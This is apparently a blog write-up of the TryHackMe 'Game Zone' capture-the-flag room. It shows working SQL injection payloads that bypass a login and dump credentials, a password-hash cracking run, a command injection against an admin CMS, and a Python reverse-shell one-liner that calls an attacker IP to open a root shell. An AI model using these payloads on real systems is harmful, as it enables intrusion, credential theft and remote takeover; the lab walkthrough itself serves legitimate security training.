My Computer

17 object(s)
 

Game Zone

Game Zone is the fourth machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.


Enumeration

Nmap scan output:

nmap -sC -sV -o gamezone <ip>
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-16 06:34 EDT
Nmap scan report for <ip>
Host is up (0.047s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds

Only two ports are available: ssh and http.

Open the in the browser and check the content on port `80`.

Exploitation

I used ' or 1=1# to bypass the login form.
After that, you will be redirected to the /portal.php page with a single search bar.
The official guide is recommending you use SQLMap here, but I’m doing this room to prepare myself for the upcoming OSCP.
SQLMap is banned on the OSCP, plus you can use the Metasploit only once. That’s why most of my writeups here are using mostly manuals ways to exploit the target.
You can read about the manual way of SQLi here, but I’ll shrink it down to the key points applicable for this box.

We got some data back if we are trying the syntax of a basic UNION injection:

' UNION SELECT 1,2,3#

First, we need to know what’s inside the DB. We can check INFORMATION_SCHEMA for that:

' UNION SELECT 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3#

As an output we got the list of schemas. information_schema,db,mysql,performance_schema,sys
We are interested in db at the first place.
Let’s check what tables can we find inside of a db:

' UNION SELECT 1,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'db'),3#

There are only two tables post and users. Users sounds more like juicy stuff, let’s dig in a bit more and extract a column of it:

' UNION SELECT 1,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'),3#

The output: username,pwd,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS Sweet, so there are username and pwd! Let’s extract them:

' UNION SELECT 1,(select username from db.users),3#

agent47

and

' UNION SELECT 1,(select pwd from db.users),3#

ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

We got credentials! Well, it’s still a hash and we have to crack it.

JohnTheReaper can help with that.

/usr/sbin/john -w=/usr/share/wordlists/rockyou.txt ./john.hash --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 128/128 AVX 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
***********    (agent47)
1g 0:00:00:00 DONE (2020-10-16 04:10) 2.325g/s 6782Kp/s 6782Kc/s 6782KC/s vimivi..veluca
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed

The password is redacted due to THM’s rule about writeups.

Now, when you have both username and password you can connect to the machine via ssh.

PrivEsc

Privilege escalation is very tricky here.
First, you can check what is running on the machine. This part is nicely described in the official guide, so I will quickly go through it:

agent47@gamezone:~$ ss -tulpn

We can see that a service running on port 10000 is blocked via a firewall rule from the outside, so we can’t interact with it directly.
However, we can use ssh tunneling to forward this service to some port in our Kali Linux machine:

ssh -L 10000:localhost:10000 agent47@<ip>

Now if you will navigate to the localhost:10000 on your Kali Linux you will find something new there - the login page for admin section of this site.
Plus, you already have the credentials! wink

From here, we can find out the name and the version of the CMS.
The thing is, that if you will check available exploits for this CMS, you will actually find a few, but both of them are Metasploit modules.
Again, my initial goal here is to avoid automated tools.
Frankly speaking, this one took me a while to figure out.
As you might guess, we will not ‘use’ the exploit itself, but I will use the vulnerability described there.

This is a snippet of the most interesting part from it:

res = send_request_cgi(
			{
				'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
				'cookie'  => "sid=#{session}"
			}, 25)

Long story short, we can specify the put a random text there, add the | symbol, and put our payload there with another | at the end.
If your goal is the flag, you can do something like

http://localhost:10000/file/show.cgi/show.cgi/bin/AAAA|cat%20/root/root.txt|

And get your flag.
But! Our goals here might be different, but I prefer to look at this as on a penetration test, and not a CTF even.

SHELL > flag

Let’s spawn a shell, then!

You have access to the system, so you can save you some time with commands like which python, which perl, etc. You can also check if the flavor of the nc supports -e flag or not.

To get the shell I used a command from PentestMonkey for python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

as you will throw it to the browser, don’t forget to URL-encode all the things:

python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.11.19.53%22%2C1337%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27

Open up a listener for your port, you can use something fancy as 1337 if you want to and trigger your root shell:

localhost:10000/file/show.cgi/show.cgi/bin/AAAA|python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.11.19.53%22%2C1337%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27|

Voilà! There you go.

Takeaway